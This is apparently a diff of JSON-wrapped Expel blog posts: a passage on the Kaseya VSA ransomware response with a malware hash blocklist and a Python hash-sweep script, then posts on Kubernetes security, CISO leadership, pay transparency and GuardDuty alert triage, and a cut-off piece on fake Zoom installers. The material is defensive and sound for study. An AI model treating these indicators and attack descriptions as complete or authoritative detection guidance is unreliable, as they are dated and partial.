They\u2019ve also shared a new Compromise Detection Tool to help determine if there are indicators of compromise on a VSA served or managed endpoint. There are also a few steps you can take right now to protect against this attack. If you haven\u2019t already done so, we recommend you immediately: Shutdown VSA server Disable / Uninstall Agent Block all known malicious hashes: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e (agent.exe) 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd (mpsvc.dll) e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 (mpsvc.dll) Lastly, make sure you incorporate these learnings into your detection strategy. After notifying our customers of the situation, Expel deployed \u201cbe on the lookout\u201d detections \u2013 where customers are immediately notified of a detection \u2013 for the two known malicious hashes, and for the known file paths the attackers have been reportedly using. Expel has also begun pushing out more generalized logic rules to catch variants of these attack vectors. What you should keep in mind We get it. Saying \u201cdon\u2019t panic\u201d is easier said than done. Constant news of emerging threats can be nerve-wracking and downright frustrating. But it\u2019s important to remember that in the minutes and hours after an announcement like this, certain things are key: communication, action and integration. Communicating with our customers and notifying them of new threats is critical. Not only do they need to know that you\u2019re on it, but this also gives them the chance to take their own actions. 
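If you want a quick local check on top of that, here's a sketch of sweeping a directory for the published SHA-256 hashes. The directory to scan is a placeholder, and this is no substitute for Kaseya's Compromise Detection Tool or your EDR.

```python
# Sketch: sweep a directory tree for files matching the SHA-256 hashes listed
# above. SCAN_ROOT is a placeholder; point it at the suspect directory or drive.
import hashlib
from pathlib import Path

KNOWN_BAD = {
    "d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e",  # agent.exe
    "8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd",  # mpsvc.dll
    "e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2",  # mpsvc.dll
}

SCAN_ROOT = Path(r"C:\suspect-path")  # placeholder

def sha256(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

for path in SCAN_ROOT.rglob("*"):
    if path.is_file() and sha256(path) in KNOWN_BAD:
        print("MATCH:", path)
```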
So, whether it\u2019s with customers or your internal teams, make sure everyone is in the loop. Time is of the essence. Depending on the situation, taking action could mean deploying new signatures, implementing a new hunting strategy, responding to active attackers or \u2013 if you\u2019ve evaluated the information and there\u2019s really nothing to do \u2013 sometimes nothing. And during an attack outbreak like this, burnout can happen quickly. The mental strain of being in constant emergency mode will only exacerbate burnout and lead to alert and response fatigue. Remember that resiliency also includes keeping your team safe from burnout . While, fortunately, Expel\u2019s customers were not impacted, this serves as a great reminder that during any incident, it\u2019s important to understand what completion looks like. As we respond to urgent incidents like this, we\u2019re also working to integrate whatever actions we took or are taking back into our usual operational cadence here at Expel. Finally, be sure to stay informed on the developments of this newest ransomware attack by regularly checking Kaseya\u2019s updates ." +} \ No newline at end of file diff --git a/kubernetes-security-what-to-look-for.json b/kubernetes-security-what-to-look-for.json new file mode 100644 index 0000000000000000000000000000000000000000..078456d1c07e3df02a6da72cc8b447aceca75fcd --- /dev/null +++ b/kubernetes-security-what-to-look-for.json @@ -0,0 +1,6 @@ +{ + "title": "Kubernetes security: what to look for", + "url": "https://expel.com/blog/kubernetes-security-what-to-look-for/", + "date": "Mar 1, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Kubernetes security: what to look for Security operations \u00b7 3 MIN READ \u00b7 DAN WHALEN \u00b7 MAR 1, 2023 \u00b7 TAGS: MDR When it comes to Kubernetes (k8s), there are three kinds of organizations: Orgs that need security (preferably sooner vs. later) Orgs that built their own security Orgs that started building their own and decided there has to be a better way We imagine there are a lot of #2s that are very close to becoming #3s. Regardless, if your operation does its own application development, k8s is likely part of your future (or present). The problem is that, like any new tech, k8s has its share of security gaps, and failure to address them could lead to\u2026suboptimal outcomes. So, if you\u2019re one of these organizations, what should you look for when building or shopping for a Kubernetes security platform? Here are a few suggestions. Kubernetes security should be integrated. There are many, many platforms, technologies, and solutions (cloud, network, endpoint, and more) in the modern security operations center (SOC), and each one represents an opportunity for the cyber defenders of the world. The ideal answer to your challenges integrates k8s development and security with as many of these disparate systems as possible, affording you a clean, unified view of your environment and the entire attack surface. This is especially important for Kubernetes, where much of the context you\u2019ll need for detection and response exists in other tech. Kubernetes security should be customizable. Technical requirements change. Business requirements change. New platforms are onboarded. Leadership decides to embark on new initiatives. If all goes well, the organization grows . It often seems like the SOC isn\u2019t the same as it was five minutes ago. 
If you aren\u2019t set up for it, change (like expanding k8s operations) can represent chaos (and chaos equals risk). As your k8s operations expand, you\u2019ll need a security environment that scales\u2014quickly and seamlessly. When this happens, security accelerates the business instead of hindering it, turning the board\u2019s periodic cost conversations into ROI conversations. Kubernetes security should be automated, fast, and accurate. Threats come at you fast. Which is why there\u2019s no substitute for intelligent automation in any SOC, especially one serving an organization that\u2019s relying more heavily on emerging technologies. K8s is especially prone to exploitable configuration errors, with more than half of organizations using Kubernetes detecting a misconfiguration in the past year . Your SOC needs to be able to analyze k8s clusters and create detections (in alignment with the MITRE ATT&CK framework ), providing you with insights you can put into play 24/7. Kubernetes security should be accessible. Security has a bit of a bad rap for being complex and obscure (something we\u2019ve tried hard to rally against). Kubernetes is already a highly specialized area of expertise\u2014if you\u2019re looking for k8s security experts\u2026good luck. Security solutions should help bridge this gap. We love Kubernetes wizards (what would we do without you?) but the truth is we can\u2019t expect everyone to be one\u2014especially as we think about folks on the front lines in a SOC. The ideal solution allows your people (technical and not) to succeed without requiring expert-level K8s chops. Kubernetes security should be transparent and trusted. This shouldn\u2019t need saying, but let\u2019s say it anyway. As k8s grows, we\u2019ll see more and more \u201csolutions\u201d aimed at safeguarding it. Not all of them are going to be ready for prime time, so question 1 has to be: Do I trust this provider with my business? Question 1a: If so, why? In our view, transparency goes a long way towards building trust\u2014these days most security folks avoid \u201cblack box\u201d solutions. You\u2019ll be tempted to try open-source tooling (there are many great projects to choose from) but don\u2019t equate open source with \u201cfree.\u201d Choosing the right solution will depend on your specific requirements and what you want to take on versus hire out. This list doesn\u2019t cover everything you need to address , but once you\u2019ve satisfied these four criteria, you\u2019ll be well down the road toward securing a genuinely transformative new development technology for your business. If you have questions or just want to talk through things, drop us a line ." +} \ No newline at end of file diff --git a/lessons-learned-from-a-ciso-s-first-100-days.json b/lessons-learned-from-a-ciso-s-first-100-days.json new file mode 100644 index 0000000000000000000000000000000000000000..a6c4d262bdae2bfde1e7f4289c974de01dd433bf --- /dev/null +++ b/lessons-learned-from-a-ciso-s-first-100-days.json @@ -0,0 +1,6 @@ +{ + "title": "Lessons learned from a CISO's first 100 days", + "url": "https://expel.com/blog/lessons-learned-from-a-cisos-first-100-days/", + "date": "Jul 11, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Lessons learned from a CISO\u2019s first 100 days Security operations \u00b7 7 MIN READ \u00b7 AMANDA FENNELL \u00b7 JUL 11, 2018 \u00b7 TAGS: Career / CISO / How to In this guest post, Amanda Fennell, CSO at Relativity reflects on what she\u2019s learned. 
I recently finished my first 100 days as Chief Security Officer (CSO) of Relativity. I\u2019ve learned a lot. And while every new CSO faces unique challenges based on their organization\u2019s mission and circumstances, with the benefit of hindsight (and a little time to breathe), I\u2019ve come up with some recommendations to help new CSOs navigate their first few months. Understanding the unique context of an organization is the first component of building a world-class security program. Our company, Relativity , is an e-discovery firm and creator of the industry-leading e-discovery platform used by over 170,000 users in 40+ countries. Our clients represent the highest tiers of government, public and private industry entities, including the Department of Justice, Deloitte and NBC Universal. Relativity\u2019s cloud solution, RelativityOne , offers all the functionality of Relativity in a secure and comprehensive SaaS product. Our clients trust our tools to discover the truth within the massive amount of documents they review and manage during investigations, litigation and lawsuits. When handling billions of highly sensitive documents, security is of utmost importance to build and maintain confidence with our valued users. Understanding the significance of security to Relativity was pivotal when I stepped into the role. Now that I\u2019ve spent the past 100+ days working to gain a better understanding of how we do what we do, I also know how to make the security team a critical part of the organization. And that leads me to my biggest takeaway. The most important thing a new CSO (or any leader) can do in their first few months is to create a compelling vision and communicate it effectively. With that, I have distilled my experience on reaching that outcome. 1. If you can, take your time Relativity moves fast \u2013 that\u2019s our culture. But if I had the chance to start this process again, I\u2019d give myself more time. The design and implementation of a security roadmap must have defined milestones, but exist as a living document to align with the inherent impermanence of the field. If you can, dedicate a defined period \u2013 ideally 30 to 90 days \u2013 to assess the current state and understand the interdependencies of the various teams in your organization. Even if you\u2019ve got the techiest of CIOs (and we do), and you immediately click, you\u2019re going to be responsible for security throughout your organization, and it takes observation and experience to understand how each team derives value from security. Understand that they have their own objectives, and roadmaps, and they\u2019re having to add you in late to the game. These first few months I was in a state of assessment and now we are moving to a state of measuring movements, growth and execution on our objectives. We have a strong team and we worked hard to assess key risks and adopt the mindset of an adversary working to breach Relativity and our clients. We completed our gap analysis with this in mind and addressed any perceived weaknesses. But I also spent my first days as CSO considering the role of security in the overall business and learning from a series of nearly 50 one-on-ones with directors and VPs to find out what matters most to folks across the company and how I could work effectively with each key stakeholder. Something as simple as a survey can help establish a more complete sense of your new organization and provides a baseline reference for measuring the success of the program. 
Shortly after taking on this new challenge, we sent out a survey to get more information on what people thought worked, and what needed addressing. A few months later, we did a follow-up to measure success. That gave us a sense of how our internal customers viewed our security team, and it was very helpful in helping me identify initial priorities and course-corrections to seize early wins. Once you\u2019ve gained an understanding of your organization\u2019s challenges, you can begin creating a vision for security and refine it across your organization. 2. Aligning Security with the Business I may not have had my final roadmap by day three, but I had started my research. I realized early-on that I wasn\u2019t going to get anywhere without budget and resources \u2013 and the best way to get those was by connecting security to revenue. Since security is a key concern for our clients at Relativity, that meant connecting with our sales department. This gave us a direct route to treat security as a product that is constantly evolving, transparently reported and consumable by our end-users. To empower our clients to trust and understand how we secure their data, we needed our marketing and sales teams to offer insight and expertise on what we do, and why we do it. I started meeting regularly with our marketing team to make sure they understood what we\u2019re doing \u2013 and so I understood how they work. I talked with them about my vision of integrating security and sales, and I got crucial buy-in to establish this partnership. I\u2019m fortunate in my role. I\u2019ve got a CEO who is extremely technical, committed to security and willing to put the time and resources into implementing the best possible solution for our clients. I inherited a top-notch product security team. But a CEO is just one person, and a company is more than security, sales and marketing. The next objective was to sell my vision of security integration across the company. From the insight gained from those initial meetings with our stakeholders, I understood the motivations and drivers for directors and VPs across the organization. I also seized the opportunity to polish my strategy and developed ways to pivot into company-wide contributions. Relativity has spent considerable effort recruiting the best minds in our industry, and they were quick to challenge my assumptions and objectives to gain a sense of my approach. Confidence in my strategy, along with passion for our mission, helped me make a convincing case. The connection between security and the business may not be as direct in your organization as it is at Relativity. But I guarantee there\u2019s a connection to a department outside of your own. You\u2019re assuredly not in a vacuum and you exist to secure your company. You fundamentally provide a service and how do you know how you\u2019re doing? How do we get things accomplished? By being part of a team. Having stakeholder meetings, SLA\u2019s and KPI\u2019s. If it seems elusive, use your one-on-ones in the first 60 days to connect the dots and push yourself to find the direct connection and identify the business questions you\u2019ll need to answer effectively. 3. Create ambassadors Once I had my vision, my strategy was relatively simple: because security is a top consideration for any company considering Relativity, the team members on our front line need to be confident when speaking to complex security topics. 
I made a business goal to work with our sales team to help them truly understand how we keep data secure. We\u2019re starting to host real, in-depth technical training sessions \u2013 not just, \u201chey, read this deck and watch this video,\u201d but actual lessons on how the customer\u2019s data is protected, how encryption works and what monitoring with our cloud security team actually looks like. By integrating with our sales and marketing team, we enable and empower them to do their jobs even better than before. Nobody has to call the security team to ask, \u201cHey, which datacenters have we got located where?\u201d They can provide a comprehensive, accurate and appropriate answer in real-time. We now have a sales team that works as an extension of our security team. If your road to connecting security to revenue doesn\u2019t go through the sales or marketing organization itself, the same principle applies. Figure out who cares about security (and who ought to). Then, get personally involved in making sure they understand your vision and can educate the team or client that needs to know. Another great example is IT. Our IT department has provided a great deal of support to prioritize security initiatives and make our vision tangible. Why? Because they care about security. You\u2019ll find solid partners in IT and engineering teams \u2013 smart, savvy and a healthy dose of paranoia about securing things. That\u2019s a great start to a partnership! 4. Pick concrete collaborators you can trust Several core values here at Relativity create a spirit of transparency. We\u2019re feedback driven. We want our people involved in the process of developing our business, which means we want everyone on the same page. That\u2019s true across teams, as well as with our third-party partner relationships. We\u2019ve selected a great set of vendors we collaborate with including Palo Alto Networks, Recorded Future, RedLock and Splunk. We made these decisions after careful review and analysis about what would be the best fit for our company, product and teams. We also wanted someone who used those products across multiple environments and industries \u2013 to give us a more diverse perspective. So we began to seek options for managed security providers. As we weighed our options, we evaluated the capabilities and strategic direction of well-known vendors and newer players. We ultimately selected Expel because of their passion and approach \u2013 particularly their transparency \u2013 was so aligned with our own principles. And we weren\u2019t disappointed. From deeply technical team calls to midnight consults via Slack, they\u2019ve got as much passion as we do, and we really understand each other. This produced an organic and collaborative solution to one of the most important functions of our work: ensuring that we keep our customers\u2019 data secure. 5. Invest where it counts \u2026 in people If you\u2019ve built a compelling vision, aligned security with the business, and communicated broadly, this one should be a cinch. But beware, when it comes to building your team, everyone will want to talk to you about HR banding and competitive pricing. But my advice on this one is simple: pay for talent. Period. You absolutely must have talented employees to build the best possible team. As much as I love and appreciate technology, I know that no tool will ever replace an amazing, talented rock star on your team. And when you can build a team of rock stars \u2026 there\u2019s nothing better. 
So, there you go. Those are my five key takeaways. I guarantee \u2013 even if this is your third or fourth rodeo in the CSO saddle \u2013 the first hundred days will be overwhelming, exhausting and exhilarating. But if you give yourself a little breathing room at the start and invest some time in doing your homework, you\u2019ll get what you need to develop and sell your vision for success. Relativity has a lot of great information about how they approach security on their website." +} \ No newline at end of file diff --git a/let-s-talk-compensation-why-expel-made-the-move-to-pay.json b/let-s-talk-compensation-why-expel-made-the-move-to-pay.json new file mode 100644 index 0000000000000000000000000000000000000000..8d62d16ce40ea00691057417a68dac9311695cb7 --- /dev/null +++ b/let-s-talk-compensation-why-expel-made-the-move-to-pay.json @@ -0,0 +1,6 @@ +{ + "title": "Let's talk compensation: Why Expel made the move to pay ...", + "url": "https://expel.com/blog/why-expel-made-the-move-to-pay-transparency/", + "date": "Apr 19, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Let\u2019s talk compensation: Why Expel made the move to pay transparency Talent \u00b7 3 MIN READ \u00b7 JEFF KAISER \u00b7 APR 19, 2022 \u00b7 TAGS: Careers If you know Expel, you know \u201ctransparency\u201d is our middle name. In fact, it\u2019s one of our core values. Which should mean it\u2019s not surprising that we\u2019ve recently embraced pay transparency at Expel. We believe that our people (current and prospective) should always feel comfortable asking about an employer\u2019s pay practices but, for many, that doesn\u2019t make the conversation any less daunting. We hope that practicing pay transparency (and spreading the word) will make this conversation easier \u2014 not just for our people, but for anyone looking to have an honest dialogue about compensation with their employer. In this post, we\u2019ll walk you through what this means to us at Expel, how we arrived at the decision, and what we\u2019ve learned along the way. Pay transparency is here to stay\u2026 and that\u2019s a good thing Pay transparency is a hot topic. Some big companies like Whole Foods and Netflix were early adopters of this approach. Now, new legislation rolling out across the U.S. requires companies to release details about pay when hiring. On top of that, the \u201cGreat Reshuffle\u201d has empowered people to ask employers for what they want \u2014 which includes fair pay. As the push for equity at work picks up speed, LinkedIn\u2019s #BigIdeas2022 predicts that 2022 is the year that pay transparency goes mainstream. We think that\u2019s the way it should be. So what is pay transparency? Pay transparency refers to the level of detail a company communicates about its pay practices. This typically happens on a scale, starting with providing basic salary info to the individual, all the way to sharing all of the details around how and why pay decisions are made. What does that scale look like at Expel? In short, we share salary ranges for job roles internally and externally, and have straightforward conversations with our people about their pay. That means: All Expletives (that\u2019s what we call our people) can see Expel salary ranges using our Compensation Lookup Tool. (A note that the salary ranges included in our tool are for roles; we do not disclose individual salaries.) Managers use the Compensation Lookup Tool as a reference when hiring. Equity, bonus, and commission targets are also included. 
All Expel job ads and descriptions include the salary min and max. Recruiters talk openly about our salary ranges to candidates. How did we get here? Over the past year, we\u2019ve been on a journey to analyze compensation, clarify decision criteria, and adjust our processes to make sure we\u2019re offering competitive, consistent, and equitable pay. There\u2019s no one-size-fits-all approach for going pay transparent. Each company has to conduct the studies and make the necessary investments to be confident in their pay practices, systems, and data. For us, this meant first conducting a salary equity analysis with an outside vendor that found no statistically significant bias in the way we pay at Expel. We then validated and adjusted our salary ranges by role to align with the market. It also involved reviews of the compensation of every Expletive to confirm consistency across roles, levels, and teams. Plus, we monitor these baselines continuously and conduct in-depth analyses annually (at least). Most importantly, we\u2019ve recognized that pay transparency is a work-in-progress. We use trusted data to track our salary ranges against the market, but we also listen to what our people, recruiters, and candidates have to say. Expletives are encouraged to ask questions and bring up their concerns around how we determine pay. We rely on our people to share new data, fresh ideas, and industry knowledge to help us navigate through the ever-changing compensation landscape. As part of that, we give Expletives resources to better understand our pay practices, and compensation education is part of everyone\u2019s professional development. For example: Live trainings and recordings are available to provide education on our compensation philosophy and strategy. We talk about job leveling, market positioning, and how we determine someone\u2019s position in their salary range. Our \u201cCompensation Lookup Tool\u201d gives all Expletives job info for all of the roles in the company, as well as salary ranges, bonus and equity information, and how we match the roles to the market. \u2026 And why? Part of our mission at Expel is to \u201ccreate space for people to do what they love,\u201d and that applies to our compensation philosophy, too. Pay transparency is a natural expression of Expel values: We take care of our people. We want everyone to have confidence in our consistent practices and equitable salaries, so they can go do what they love without that worry. We value transparency. Having clear decision criteria and helping Expletives understand how pay decisions are made opens communication and builds trust. Pay transparency improves inclusion and diversity. By communicating our salary ranges internally and externally, we are taking a solid step to disrupting systemic inequity. What we\u2019ve learned Pay transparency is about being transparent in more ways than one. It\u2019s about more than analyses and updated salary ranges on job ads. You have to \u201cwalk the walk\u201d and communicate the results to your people. Explain your compensation philosophy clearly, and give context and criteria for your pay decisions. After a year of work, we\u2019re proud of how far we\u2019ve come, and we\u2019ve made sure to bring Expletives along on every step of the journey. This honest and open approach to compensation isn\u2019t just what we believe in, it\u2019s the right thing to do. Questions about our move toward pay transparency, or anything else that makes Expel, Expel? Reach out any time ." 
+} \ No newline at end of file diff --git a/making-sense-of-amazon-guardduty-alerts.json b/making-sense-of-amazon-guardduty-alerts.json new file mode 100644 index 0000000000000000000000000000000000000000..7f29b107bf8483d509e94cafbba18412a06cf58b --- /dev/null +++ b/making-sense-of-amazon-guardduty-alerts.json @@ -0,0 +1,6 @@ +{ + "title": "Making sense of Amazon GuardDuty alerts", + "url": "https://expel.com/blog/making-sense-amazon-guardduty-alerts/", + "date": "Oct 15, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Making sense of Amazon GuardDuty alerts Security operations \u00b7 5 MIN READ \u00b7 ANTHONY RANDAZZO \u00b7 OCT 15, 2019 \u00b7 TAGS: Cloud security / Get technical / How to / Managed security / SOC Gone are the days when we only had to protect some physical servers and all of the associated networking gear used to route traffic to and from those servers in our data centers. Fast forward to today \u2014 most companies are running at least some of their workloads in the cloud. Today we\u2019ve got virtualized servers, abstracted services and a simplified networking layer all managed via an API. Amazon Web Services (AWS) offers lots of security services to help protect their customers\u2019 data. One of the more well-known services for detection and response is Amazon GuardDuty . If you\u2019ve heard of Amazon GuardDuty but aren\u2019t exactly sure how to get the most out of it, then this post is for you. I\u2019ll talk about how Amazon GuardDuty works, share the kinds of threats it\u2019s looking for, show you some sample alert investigations and offer a couple tips for how to make more sense of the signals you get from GuardDuty. What is GuardDuty in AWS? Amazon GuardDuty is a continuous threat monitoring service available to AWS customers that works by consuming CloudTrail logs (AWS native API logging), Virtual Private Cloud (VPC) flow logs and DNS logs. Fortunately, CloudTrail logging is enabled by default \u2014 and you don\u2019t even have to pay for VPC flow logs or Amazon Route 53 (AWS DNS) to benefit from GuardDuty as long as you\u2019re using an AWS DNS resolver (versus using something like Google or OpenDNS). However, having VPC flow logs enabled will provide defenders another tool in their toolbox to use when investigating potential security incidents (more on this later). Now, if you consider what visibility AWS has into its customer\u2019s data and services , then GuardDuty\u2019s use of these three datasets make sense. Now let\u2019s look at what types of alerts GuardDuty might generate for us by using flow, DNS and API activity logs. As of today, there are 54 unique GuardDuty findings (more commonly known as rules). These are all based on easy to understand logic or basic anomaly detection. Each finding has the following naming convention: ThreatPurpose:ResourceTypeAffected/ThreatFamilyName.ThreatFamilyVariant!Artifact We\u2019ll focus on the \u2018ResourceTypeAffected\u2019 portion of that convention because this is the most important section to understand when you\u2019re reviewing GuardDuty alerts. Today, this field will consist of either \u2018IAMUser\u2019 or \u2018EC2\u2019. All Elastic Cloud Compute (EC2) rules are based on VPC flow logs or DNS logs, while the \u2018IAMUser\u2019 rules generate alerts from CloudTrail API logs and possibly in conjunction with flow and DNS logs. We\u2019ve found the \u2018IAMUser\u2019 rules to be quite valuable, as they indicate authenticated access into your AWS account. 
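For anyone who wants to operationalize the finding-type convention described in the GuardDuty post above (ThreatPurpose:ResourceTypeAffected/ThreatFamilyName.ThreatFamilyVariant!Artifact), here is a minimal Python sketch that parses a finding type and routes on ResourceTypeAffected, the field the post calls out as most important. The regex, function name, and triage hints are illustrative assumptions, not anything from the AWS SDK.

```python
import re

# Illustrative parser for the GuardDuty finding-type convention quoted above:
#   ThreatPurpose:ResourceTypeAffected/ThreatFamilyName.ThreatFamilyVariant!Artifact
# Only the first two fields are assumed to always be present.
FINDING_TYPE_RE = re.compile(
    r"^(?P<purpose>[^:]+):(?P<resource>[^/]+)"
    r"(?:/(?P<family>[^.!]+))?"
    r"(?:\.(?P<variant>[^!]+))?"
    r"(?:!(?P<artifact>.+))?$"
)

def route_finding(finding_type: str) -> str:
    """Return a rough triage hint based on ResourceTypeAffected."""
    match = FINDING_TYPE_RE.match(finding_type)
    if not match:
        return "unrecognized finding format"
    resource = match.group("resource")
    if resource == "IAMUser":
        # Per the post: driven by CloudTrail, i.e. authenticated API activity.
        return "authenticated access -- review CloudTrail for this principal"
    if resource == "EC2":
        # Per the post: driven by VPC flow logs and/or DNS logs.
        return "network signal -- review VPC flow and DNS logs for the instance"
    return f"unhandled resource type: {resource}"

print(route_finding("UnauthorizedAccess:EC2/TorIPCaller"))
print(route_finding("UnauthorizedAccess:IAMUser/TorIPCaller"))
```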
Because of AWS\u2019 visibility into our data, many of the \u2018EC2\u2019 rules are based on an AWS-curated threat lists of atomic IOCs such as domains and IPs. These are then filtered against the flow and DNS logs. But there\u2019s a problem: just like with most security tech, we don\u2019t have any visibility into the threat lists that AWS is using and how they match up (or don\u2019t match up) with the threats we\u2019re concerned with for our own org. However, there\u2019s a silver lining here: You\u2019re able to provide your own threat lists from third parties and even automate the ingestion of these lists into GuardDuty. This can be IOCs you\u2019ve identified internally to your org or external feeds you subscribe to or consume through something like a Threat Intelligence Platform . When considering the pyramid of pain \u2014 a model focusing on how best to disrupt attackers \u2014 many of these GuardDuty alerts correspond to the bottom of the pyramid. When consuming lower fidelity alerts, we recommend enriching those with additional context to provide analysts with more decision support. Here at Expel we take advantage of some third-party enrichment services, such as passive DNS, WHOIS information, OSINT and other data to get a better understanding of the potential threats associated with these IPs and domains identified by GuardDuty. Investigating GuardDuty alerts Now that we have an idea of what to expect in a GuardDuty alert, let\u2019s take a look at a couple different example alerts. Expel uses the AWS API to consume our customers\u2019 GuardDuty alerts directly from their AWS Accounts and then we normalize the GuardDuty alert data in Expel Workbench for our analysts. NOTE: These alerts were generated with GuardDuty\u2019s built-in \u2018generate sample findings\u2019 regression test. Here we get a pretty straightforward explanation in Expel Workbench that our EC2 instance is making connections with a known Tor exit node . Given what we know about these EC2 rules, this alert was simply generated from the VPC flow logs based on an AWS threat list for known Tor exit nodes. This is where those VPC flow logs would really come in handy. Flow logs contain not only the source and destination IP and ports, but also how much traffic was actually passed. Depending on the function of your EC2 instance, this can paint a pretty telling picture as to whether there might be an instance compromise or not. If we need more answers, then you\u2019ll need a snapshot of that EC2 for a deeper dive or potentially having some other endpoint software such as EDR running inside of that instance. The latter will depend on your organization\u2019s risk tolerance for security software running on your production (AKA revenue generating) assets. Next, let\u2019s look at another alert that looks similar at a glance but has drastically different implications. This alert isn\u2019t quite as straightforward as the previous, but if we revisit what we know about GuardDuty alerts with \u2018IAMUser\u2019 as the ResourceTypeAffected, then we know this originated from a CloudTrail log(s). This is where we might sound the alarm. What you\u2019re looking at is someone with API credentials making successful API calls to your AWS account from the Tor anonymizing network. Unless your org has some privacy averse AWS admins or developers, then there\u2019s little reason for you see this particular alert. Now you need to do some analysis. 
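Since the post above mentions that you can automate ingestion of your own threat lists into GuardDuty, and that the example alerts came from the built-in "generate sample findings" test, here is a hedged boto3 sketch of both. It assumes boto3 with working credentials; the region, list name, and S3 location are placeholders, and the exact Location format accepted for threat intel sets is worth confirming against current AWS documentation.

```python
import boto3

guardduty = boto3.client("guardduty", region_name="us-east-1")  # region is a placeholder

detector_id = guardduty.list_detectors()["DetectorIds"][0]

# Ingest an org-curated, plain-text IOC list (one IP/domain per line) staged in S3.
# Bucket and object key are placeholders.
guardduty.create_threat_intel_set(
    DetectorId=detector_id,
    Name="org-curated-iocs",
    Format="TXT",
    Location="s3://my-security-bucket/threat-lists/iocs.txt",
    Activate=True,
)

# Kick off the built-in sample findings (the regression test used for the alerts above).
guardduty.create_sample_findings(
    DetectorId=detector_id,
    FindingTypes=["UnauthorizedAccess:EC2/TorIPCaller"],
)
```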
Determine if an AWS Identity and Access Management (IAM) user or role was compromised as this could help you determine how those credentials may have been compromised. The key difference between these two are that User credentials are permanent whereas role credentials are temporary (lasting between 1 \u2013 12 hours). A user compromise might imply leaked API access keys on GitHub or something similar, while a role compromise will generally implicate some other deeper-rooted issue in your environment such a Server Side Request Forgery (SSRF) vulnerability . Lastly, let\u2019s look at a real-world GuardDuty alert. In this alert, Expel analysts identified the anomalous detection of an AWS service user (a Continuous Integration/Continuous Delivery IAM user) making a suspicious API call, ListAccessKeys , that should never be attempted by that user given its purpose. Fortunately, GuardDuty has some insight into what API calls a user or role normally makes. This threat actor was able to initially compromise a less privileged user access key for the AWS account and then the attacker pivoted with a variety of methods to expand access and privileges into other IAM users and roles. 4 things to remember when reviewing Amazon GuardDuty alerts GuardDuty alerts are generated based on VPC flow logs, DNS logs, and CloudTrail API logs. Currently, there are two primary classes of GuardDuty alerts: alerts based on DNS or VPC flow in and out of your EC2, and alerts that are generated from suspicious IAM (authenticated) API activity. Many of the GuardDuty alerts are generated based on threat lists of known malicious domains and IPs. Like most security technology, these threat lists may or may not be what you care about in your org\u2019s threat model \u2014 consider enriching these alerts with additional decision support such as passive DNS, WHOIS data, or other IP reputation. Keep a close eye out for IAM-related GuardDuty alerts, as this implies there\u2019s an authenticated API session to your AWS account." +} \ No newline at end of file diff --git a/malware-operators-zoom-ing-in.json b/malware-operators-zoom-ing-in.json new file mode 100644 index 0000000000000000000000000000000000000000..5701a49d84816178d5255e8a892e76ff80560483 --- /dev/null +++ b/malware-operators-zoom-ing-in.json @@ -0,0 +1,6 @@ +{ + "title": "Malware operators Zoom'ing in", + "url": "https://expel.com/blog/malware-operators-zooming-in/", + "date": "Apr 16, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Malware operators Zoom\u2019ing in Tips \u00b7 6 MIN READ \u00b7 JOSHUA KIM \u00b7 APR 16, 2020 \u00b7 TAGS: Get technical / Managed detection and response / Security Incident / SOC / Vulnerability It\u2019s no surprise that Zoom\u2019s popularity recently skyrocketed. Whether it\u2019s remote employees using it as their main way to stay connected or families finding virtual ways to visit with cousins and grandparents, it\u2019s become a go-to tool for staying in touch as we all practice good social distancing. When I say Zoom\u2019s popularity is off-the-charts high, I\u2019m not kidding . For fun, I compared its recent interests trend to that of other video apps, thanks to some data made available by Google . The TL;DR: It looks like we were collectively interested in the release of Tiger King on Netflix while also learning more about Zoom and how to change the background image. Comparison of common video conferencing applications interest over time. Everyone\u2019s using Zoom \u2026 what\u2019s new? 
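To make the user-versus-role question from the GuardDuty discussion above easier to answer during triage, here is a small illustrative helper that inspects the userIdentity block of a CloudTrail record. The AKIA/ASIA access-key-prefix check is a common heuristic (AKIA for long-term user keys, ASIA for temporary STS credentials) and the remediation hints simply restate the post, so treat the output as a starting point, not a verdict.

```python
def classify_credential(cloudtrail_event: dict) -> str:
    """Rough triage: permanent IAM user keys vs. temporary role credentials."""
    identity = cloudtrail_event.get("userIdentity", {})
    id_type = identity.get("type")
    key_id = identity.get("accessKeyId", "")
    # Heuristic: AKIA-prefixed keys are long-term, ASIA-prefixed keys are temporary.
    if id_type == "IAMUser" or key_id.startswith("AKIA"):
        return "long-term user key -- think leaked access keys (e.g. a public repo)"
    if id_type == "AssumedRole" or key_id.startswith("ASIA"):
        return "temporary role credentials -- look for a deeper issue (e.g. SSRF)"
    return f"other identity type: {id_type}"

# Minimal, hand-made example record (real events carry many more fields).
event = {"userIdentity": {"type": "IAMUser", "accessKeyId": "AKIAEXAMPLEKEYID1234"}}
print(classify_credential(event))
```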
Zoom\u2019s turned into the defacto video conferencing solution \u2013 and with that comes both wanted and unwanted attention . While the app provides a great opportunity for us to stay connected, your family, friends and neighbors may not be as security-conscious as you are \u2013 making them vulnerable to attack. In this post I\u2019ll detail a recent attack the Expel team identified and share some tips that you can follow to make sure your Zoom downloads are safe. \u201cIn the midst of chaos, there is also opportunity\u201d \u2013 Sun Tzu (\u2026 for clever attackers) Attackers are finding new ways to pounce and capitalize on the current global outbreak to target unsuspecting users via some of their most-loved apps and websites. Which is what we witnessed last week when our SOC identified an incident involving a drive-by download of a fake Zoom installer bundled with malware. If someone\u2019s downloading Zoom, are they sure they downloaded and installed Zoom directly from their website? With this recent finding, it\u2019s possible that many may have downloaded the installer from a fake website onto their computers \u2013 and social distancing isn\u2019t going to help protect you against this particular threat from accessing your sensitive data. Emerging threat: Zoom installers bundled with malware I\u2019ll walk you through exactly how this attack happened and will share a few tips for staying safe and avoiding a malware attack like this one. Take a look at the images below. This is a quick comparison of the malicious, self-extracting Zoom installer property details 